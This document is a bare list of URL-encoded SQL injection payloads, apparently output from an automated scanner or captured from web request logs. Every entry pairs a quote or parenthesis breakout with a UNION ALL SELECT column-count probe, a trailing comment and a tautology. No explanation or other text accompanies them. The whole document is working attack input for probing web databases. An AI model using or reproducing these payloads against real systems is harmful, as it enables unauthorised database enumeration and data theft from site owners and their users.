-2244%27%29%20UNION%20ALL%20SELECT%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399--%20%20AND%20%28%27gDZj%27%20LIKE%20%27gDZj -3407%27%29%20UNION%20ALL%20SELECT%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439--%20%20AND%20%28%27DgTQ%27%20LIKE%20%27DgTQ -1854%27%29%20UNION%20ALL%20SELECT%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483%2C%208483--%20%20AND%20%28%27SJIY%27%20LIKE%20%27SJIY -1241%27%29%20UNION%20ALL%20SELECT%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873%2C%207873--%20%20AND%20%28%27ILKp%27%20LIKE%20%27ILKp -5890%27%29%20UNION%20ALL%20SELECT%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206--%20%20AND%20%28%27GNnI%27%20LIKE%20%27GNnI -5467%27%29%20UNION%20ALL%20SELECT%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272--%20%20AND%20%28%27KngJ%27%20LIKE%20%27KngJ -4705%27%29%20UNION%20ALL%20SELECT%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124--%20%20AND%20%28%27wLgK%27%20LIKE%20%27wLgK -9021%27%29%20UNION%20ALL%20SELECT%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040%2C%205040--%20%20AND%20%28%27JNqn%27%20LIKE%20%27JNqn -2148%27%29%20UNION%20ALL%20SELECT%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942%2C%206942--%20%20AND%20%28%27TQdG%27%20LIKE%20%27TQdG -6455%27%29%29%20UNION%20ALL%20SELECT%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080--%20%20AND%20%28%28%27ZjWF%27%20LIKE%20%27ZjWF -4446%27%29%29%20UNION%20ALL%20SELECT%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877%2C%208877--%20%20AND%20%28%28%27MOov%27%20LIKE%20%27MOov -1131%27%29%29%20UNION%20ALL%20SELECT%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851--%20%20AND%20%28%28%27MnTx%27%20LIKE%20%27MnTx -6900%27%29%29%20UNION%20ALL%20SELECT%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661--%20%20AND%20%28%28%27BonJ%27%20LIKE%20%27BonJ -7284%27%29%29%20UNION%20ALL%20SELECT%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873%2C%208873--%20%20AND%20%28%28%27ZmFh%27%20LIKE%20%27ZmFh -5458%27%29%29%20UNION%20ALL%20SELECT%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802--%20%20AND%20%28%28%27iYQH%27%20LIKE%20%27iYQH -7196%27%29%29%20UNION%20ALL%20SELECT%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206%2C%209206--%20%20AND%20%28%28%27jPda%27%20LIKE%20%27jPda -2932%27%29%29%20UNION%20ALL%20SELECT%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628%2C%207628--%20%20AND%20%28%28%27qjUL%27%20LIKE%20%27qjUL -2441%27%29%29%20UNION%20ALL%20SELECT%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591%2C%204591--%20%20AND%20%28%28%27rZmp%27%20LIKE%20%27rZmp -5065%27%29%29%20UNION%20ALL%20SELECT%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476%2C%201476--%20%20AND%20%28%28%27nIDi%27%20LIKE%20%27nIDi -9224%27%29%29%29%20UNION%20ALL%20SELECT%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880%2C%207880--%20%20AND%20%28%28%28%27KjbX%27%20LIKE%20%27KjbX -7177%27%29%29%29%20UNION%20ALL%20SELECT%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928%2C%206928--%20%20AND%20%28%28%28%27vksE%27%20LIKE%20%27vksE -2548%27%29%29%29%20UNION%20ALL%20SELECT%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068%2C%201068--%20%20AND%20%28%28%28%27LMrh%27%20LIKE%20%27LMrh -3292%27%29%29%29%20UNION%20ALL%20SELECT%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140--%20%20AND%20%28%28%28%27kLuV%27%20LIKE%20%27kLuV -9067%27%29%29%29%20UNION%20ALL%20SELECT%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311--%20%20AND%20%28%28%28%27IUpN%27%20LIKE%20%27IUpN -9603%27%29%29%29%20UNION%20ALL%20SELECT%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002--%20%20AND%20%28%28%28%27cBmX%27%20LIKE%20%27cBmX -4627%27%29%29%29%20UNION%20ALL%20SELECT%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910--%20%20AND%20%28%28%28%27HGcM%27%20LIKE%20%27HGcM -8111%27%29%29%29%20UNION%20ALL%20SELECT%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663%2C%206663--%20%20AND%20%28%28%28%27WQAO%27%20LIKE%20%27WQAO -9278%27%29%29%29%20UNION%20ALL%20SELECT%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273--%20%20AND%20%28%28%28%27DgST%27%20LIKE%20%27DgST -9366%27%29%29%29%20UNION%20ALL%20SELECT%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944%2C%201944--%20%20AND%20%28%28%28%27cIZl%27%20LIKE%20%27cIZl -7838%27%20UNION%20ALL%20SELECT%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946--%20%20AND%20%27Tslp%27%20LIKE%20%27Tslp -5526%27%20UNION%20ALL%20SELECT%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072--%20%20AND%20%27fLkU%27%20LIKE%20%27fLkU -5927%27%20UNION%20ALL%20SELECT%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763%2C%208763--%20%20AND%20%27zCkg%27%20LIKE%20%27zCkg -9171%27%20UNION%20ALL%20SELECT%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839--%20%20AND%20%27RwHC%27%20LIKE%20%27RwHC -9633%27%20UNION%20ALL%20SELECT%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409--%20%20AND%20%27BkIk%27%20LIKE%20%27BkIk -8641%27%20UNION%20ALL%20SELECT%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074--%20%20AND%20%27qAoT%27%20LIKE%20%27qAoT -2467%27%20UNION%20ALL%20SELECT%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766--%20%20AND%20%27FZfd%27%20LIKE%20%27FZfd -1904%27%20UNION%20ALL%20SELECT%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686--%20%20AND%20%27NzBv%27%20LIKE%20%27NzBv -7125%27%20UNION%20ALL%20SELECT%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445--%20%20AND%20%27Wdxm%27%20LIKE%20%27Wdxm -7907%27%20UNION%20ALL%20SELECT%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440%2C%204440--%20%20AND%20%27koyr%27%20LIKE%20%27koyr -1588%22%29%20UNION%20ALL%20SELECT%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971%2C%204971--%20%20AND%20%28%22PNAw%22%3D%22PNAw -7241%22%29%20UNION%20ALL%20SELECT%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002--%20%20AND%20%28%22GaUU%22%3D%22GaUU -9677%22%29%20UNION%20ALL%20SELECT%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690%2C%206690--%20%20AND%20%28%22Cniy%22%3D%22Cniy -4438%22%29%20UNION%20ALL%20SELECT%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082%2C%201082--%20%20AND%20%28%22wbVI%22%3D%22wbVI -7806%22%29%20UNION%20ALL%20SELECT%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965--%20%20AND%20%28%22cjAS%22%3D%22cjAS -1527%22%29%20UNION%20ALL%20SELECT%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272--%20%20AND%20%28%22eUXx%22%3D%22eUXx -5168%22%29%20UNION%20ALL%20SELECT%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630--%20%20AND%20%28%22RcSA%22%3D%22RcSA -9591%22%29%20UNION%20ALL%20SELECT%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886--%20%20AND%20%28%22eycc%22%3D%22eycc -1105%22%29%20UNION%20ALL%20SELECT%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151--%20%20AND%20%28%22aICN%22%3D%22aICN -3687%22%29%20UNION%20ALL%20SELECT%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449--%20%20AND%20%28%22Ctrs%22%3D%22Ctrs -6380%22%29%29%20UNION%20ALL%20SELECT%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738--%20%20AND%20%28%28%22QigB%22%3D%22QigB -7292%22%29%29%20UNION%20ALL%20SELECT%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302--%20%20AND%20%28%28%22LOwr%22%3D%22LOwr -9941%22%29%29%20UNION%20ALL%20SELECT%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013--%20%20AND%20%28%28%22lTZT%22%3D%22lTZT -6316%22%29%29%20UNION%20ALL%20SELECT%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218--%20%20AND%20%28%28%22QQkq%22%3D%22QQkq -1756%22%29%29%20UNION%20ALL%20SELECT%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806%2C%207806--%20%20AND%20%28%28%22tiIz%22%3D%22tiIz -4297%22%29%29%20UNION%20ALL%20SELECT%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812%2C%208812--%20%20AND%20%28%28%22uinB%22%3D%22uinB -9849%22%29%29%20UNION%20ALL%20SELECT%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606%2C%202606--%20%20AND%20%28%28%22ofpg%22%3D%22ofpg -4321%22%29%29%20UNION%20ALL%20SELECT%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581--%20%20AND%20%28%28%22tQkk%22%3D%22tQkk -7276%22%29%29%20UNION%20ALL%20SELECT%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698--%20%20AND%20%28%28%22SVoR%22%3D%22SVoR -6003%22%29%29%20UNION%20ALL%20SELECT%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191%2C%202191--%20%20AND%20%28%28%22KAiC%22%3D%22KAiC -1129%22%29%29%29%20UNION%20ALL%20SELECT%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069--%20%20AND%20%28%28%28%22VjAY%22%3D%22VjAY -2109%22%29%29%29%20UNION%20ALL%20SELECT%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665%2C%202665--%20%20AND%20%28%28%28%22jsyJ%22%3D%22jsyJ -2989%22%29%29%29%20UNION%20ALL%20SELECT%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438%2C%206438--%20%20AND%20%28%28%28%22HNkR%22%3D%22HNkR -8551%22%29%29%29%20UNION%20ALL%20SELECT%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624%2C%207624--%20%20AND%20%28%28%28%22vnhg%22%3D%22vnhg -1289%22%29%29%29%20UNION%20ALL%20SELECT%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700--%20%20AND%20%28%28%28%22rBzj%22%3D%22rBzj -1493%22%29%29%29%20UNION%20ALL%20SELECT%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001--%20%20AND%20%28%28%28%22qgsk%22%3D%22qgsk -9285%22%29%29%29%20UNION%20ALL%20SELECT%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430--%20%20AND%20%28%28%28%22cUSO%22%3D%22cUSO -3020%22%29%29%29%20UNION%20ALL%20SELECT%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126--%20%20AND%20%28%28%28%22KiIC%22%3D%22KiIC -8627%22%29%29%29%20UNION%20ALL%20SELECT%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034%2C%207034--%20%20AND%20%28%28%28%22hDWA%22%3D%22hDWA -7754%22%29%29%29%20UNION%20ALL%20SELECT%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703%2C%205703--%20%20AND%20%28%28%28%22WmEO%22%3D%22WmEO -3705%22%20UNION%20ALL%20SELECT%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452%2C%209452--%20%20AND%20%22gnou%22%3D%22gnou -8621%22%20UNION%20ALL%20SELECT%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138%2C%204138--%20%20AND%20%22vVjo%22%3D%22vVjo -8795%22%20UNION%20ALL%20SELECT%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979%2C%206979--%20%20AND%20%22YFjF%22%3D%22YFjF -4699%22%20UNION%20ALL%20SELECT%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569%2C%204569--%20%20AND%20%22nUBT%22%3D%22nUBT 